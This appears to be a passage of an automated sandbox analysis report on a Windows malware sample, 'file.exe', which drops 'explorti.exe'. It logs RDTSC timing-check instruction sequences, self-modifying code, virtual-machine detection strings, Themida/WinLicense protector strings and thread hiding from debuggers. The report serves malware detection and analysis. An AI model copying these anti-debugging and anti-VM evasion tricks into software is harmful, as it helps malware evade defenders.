                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02EC second address: 50C02F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02F2 second address: 50C0303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7981407BEDh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070055 second address: 507005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507005B second address: 50700AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, cl 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F7981407BF8h 0x00000016 and si, 4468h 0x0000001b jmp 00007F7981407BEBh 0x00000020 popfd 0x00000021 call 00007F7981407BF8h 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50700AF second address: 507010E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov esi, 44E28D99h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7980D061C1h 0x00000019 xor si, F7E6h 0x0000001e jmp 00007F7980D061C1h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F7980D061C0h 0x0000002a and si, CB88h 0x0000002f jmp 00007F7980D061BBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507010E second address: 5070132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070132 second address: 5070136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070136 second address: 5070149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070149 second address: 5070161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7980D061C4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070161 second address: 50701D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 pushfd 0x00000011 jmp 00007F7981407BF0h 0x00000016 or esi, 4ED1E5D8h 0x0000001c jmp 00007F7981407BEBh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 jmp 00007F7981407BF6h 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F7981407BF0h 0x0000002f push eax 0x00000030 jmp 00007F7981407BEBh 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b mov eax, edi 0x0000003d popad 0x0000003e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50701D8 second address: 50701DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50701DE second address: 50701E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50701E2 second address: 5070264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e jmp 00007F7980D061C0h 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F7980D061BEh 0x0000001b add esi, 5EFB2F58h 0x00000021 jmp 00007F7980D061BBh 0x00000026 popfd 0x00000027 mov bx, cx 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F7980D061C5h 0x00000031 xchg eax, esi 0x00000032 jmp 00007F7980D061BEh 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070264 second address: 507026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507026A second address: 507029C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7980D061C7h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507029C second address: 50702F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, FC9Ah 0x00000007 call 00007F7981407BEBh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov eax, edi 0x00000016 pushfd 0x00000017 jmp 00007F7981407BF7h 0x0000001c xor eax, 54A6739Eh 0x00000022 jmp 00007F7981407BF9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702F1 second address: 507037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F7980D061BEh 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov cl, D2h 0x00000014 pushfd 0x00000015 jmp 00007F7980D061C3h 0x0000001a adc si, AB0Eh 0x0000001f jmp 00007F7980D061C9h 0x00000024 popfd 0x00000025 popad 0x00000026 je 00007F79F2BC447Dh 0x0000002c pushad 0x0000002d mov cl, B6h 0x0000002f movsx edx, cx 0x00000032 popad 0x00000033 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F7980D061C7h 0x00000041 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507037B second address: 5070381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070381 second address: 5070385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070385 second address: 50703CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F79F32C5E84h 0x0000000e pushad 0x0000000f call 00007F7981407BEDh 0x00000014 pushfd 0x00000015 jmp 00007F7981407BF0h 0x0000001a xor eax, 7EC9E648h 0x00000020 jmp 00007F7981407BEBh 0x00000025 popfd 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 mov bx, 9FEAh 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703CB second address: 507049A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7980D061BBh 0x00000008 add cl, FFFFFF8Eh 0x0000000b jmp 00007F7980D061C9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7980D061BCh 0x0000001e and esi, 17731B08h 0x00000024 jmp 00007F7980D061BBh 0x00000029 popfd 0x0000002a call 00007F7980D061C8h 0x0000002f pushfd 0x00000030 jmp 00007F7980D061C2h 0x00000035 xor eax, 354A5098h 0x0000003b jmp 00007F7980D061BBh 0x00000040 popfd 0x00000041 pop eax 0x00000042 popad 0x00000043 or edx, dword ptr [ebp+0Ch] 0x00000046 jmp 00007F7980D061BFh 0x0000004b test edx, 61000000h 0x00000051 pushad 0x00000052 movzx esi, dx 0x00000055 popad 0x00000056 jne 00007F79F2BC43C6h 0x0000005c jmp 00007F7980D061BAh 0x00000061 test byte ptr [esi+48h], 00000001h 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F7980D061BAh 0x0000006e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507049A second address: 507049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507049E second address: 50704A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50704A4 second address: 50704BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F79F32C5DD8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov eax, 2141A059h 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50704BE second address: 50704C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50704C4 second address: 50704C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506085B second address: 50608AF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7980D061C2h 0x00000008 sub cx, 06D8h 0x0000000d jmp 00007F7980D061BBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ecx, 74D3C98Fh 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d movzx esi, di 0x00000020 mov ecx, edi 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F7980D061C6h 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50608AF second address: 50608B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50608B5 second address: 50608BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50608BB second address: 5060903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7981407BF8h 0x00000011 and ah, FFFFFFF8h 0x00000014 jmp 00007F7981407BEBh 0x00000019 popfd 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e pushad 0x0000001f mov eax, edi 0x00000021 mov bx, C072h 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov al, bh 0x0000002c mov edx, ecx 0x0000002e popad 0x0000002f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060903 second address: 5060909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060909 second address: 506090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506090D second address: 5060911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060911 second address: 5060928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7981407BEAh 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060928 second address: 506098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7980D061C1h 0x00000008 pop ecx 0x00000009 call 00007F7980D061C1h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 jmp 00007F7980D061BCh 0x00000018 mov dword ptr [esp], esi 0x0000001b jmp 00007F7980D061C0h 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 pushad 0x00000024 push ecx 0x00000025 mov cx, dx 0x00000028 pop edx 0x00000029 movzx eax, dx 0x0000002c popad 0x0000002d mov ebx, 00000000h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506098A second address: 506098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506098E second address: 5060992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060992 second address: 5060998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060998 second address: 50609FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F7980D061C0h 0x00000010 je 00007F79F2BCBB84h 0x00000016 jmp 00007F7980D061C0h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007F7980D061C0h 0x00000027 mov ecx, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F7980D061BAh 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50609FD second address: 5060A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060A03 second address: 5060A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6530CFE3h 0x00000008 mov eax, 2F16873Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F79F2BCBB46h 0x00000016 pushad 0x00000017 call 00007F7980D061C0h 0x0000001c pop eax 0x0000001d jmp 00007F7980D061C7h 0x00000022 popad 0x00000023 test byte ptr [76FB6968h], 00000002h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7980D061C5h 0x00000031 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060A61 second address: 5060A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060A67 second address: 5060A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F79F2BCBAFDh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7980D061C2h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060A89 second address: 5060AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060AA1 second address: 5060AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060AA5 second address: 5060AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060AA9 second address: 5060AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060AAF second address: 5060B49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e call 00007F7981407BEAh 0x00000013 call 00007F7981407BF2h 0x00000018 pop ecx 0x00000019 pop edx 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d push edi 0x0000001e call 00007F7981407BEAh 0x00000023 pop eax 0x00000024 pop edx 0x00000025 call 00007F7981407BF0h 0x0000002a pushfd 0x0000002b jmp 00007F7981407BF2h 0x00000030 jmp 00007F7981407BF5h 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F7981407BF9h 0x00000042 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060B49 second address: 5060B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060B4D second address: 5060B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060B53 second address: 5060BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F7980D061C0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7980D061BCh 0x00000019 jmp 00007F7980D061C5h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F7980D061C0h 0x00000025 add ah, FFFFFFE8h 0x00000028 jmp 00007F7980D061BBh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060BBC second address: 5060BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060BC2 second address: 5060BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060BC6 second address: 5060C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F7981407BF6h 0x00000011 push dword ptr [ebp+14h] 0x00000014 jmp 00007F7981407BF0h 0x00000019 push dword ptr [ebp+10h] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060C1D second address: 5060CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7980D061C4h 0x00000009 popad 0x0000000a pop esi 0x0000000b jmp 00007F7980D061C0h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F7980D061BEh 0x00000018 jmp 00007F7980D061C5h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F7980D061C0h 0x00000024 sub eax, 75D9AEF8h 0x0000002a jmp 00007F7980D061BBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov esp, ebp 0x00000033 jmp 00007F7980D061C6h 0x00000038 pop ebp 0x00000039 pushad 0x0000003a call 00007F7980D061BEh 0x0000003f pushfd 0x00000040 jmp 00007F7980D061C2h 0x00000045 xor cx, 13B8h 0x0000004a jmp 00007F7980D061BBh 0x0000004f popfd 0x00000050 pop esi 0x00000051 push eax 0x00000052 push edx 0x00000053 movsx ebx, cx 0x00000056 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070DD9 second address: 5070DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Tries to evade debugger and weak emulator (self modifying code)
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CE5F82 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CD06A2 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D46E21 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 3A5F82 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 3906A2 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 406E21 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_050E024A rdtsc 0_2_050E024A
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 2022Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 390Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 2011Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3668Thread sleep count: 31 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3668Thread sleep time: -62031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7108Thread sleep count: 2022 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7108Thread sleep time: -4046022s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6192Thread sleep count: 390 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6192Thread sleep time: -11700000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7344Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 984Thread sleep count: 2011 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 984Thread sleep time: -4024011s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                      Source: explorti.exe, explorti.exe, 0000000A.00000002.3556094696.000000000035F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: explorti.exe, 00000001.00000002.4137022991.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000002.4137022991.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: file.exe, 00000000.00000002.1719426921.0000000000C9F000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1756046360.000000000035F000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2355321177.000000000035F000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000009.00000002.2955908785.000000000035F000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000A.00000002.3556094696.000000000035F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
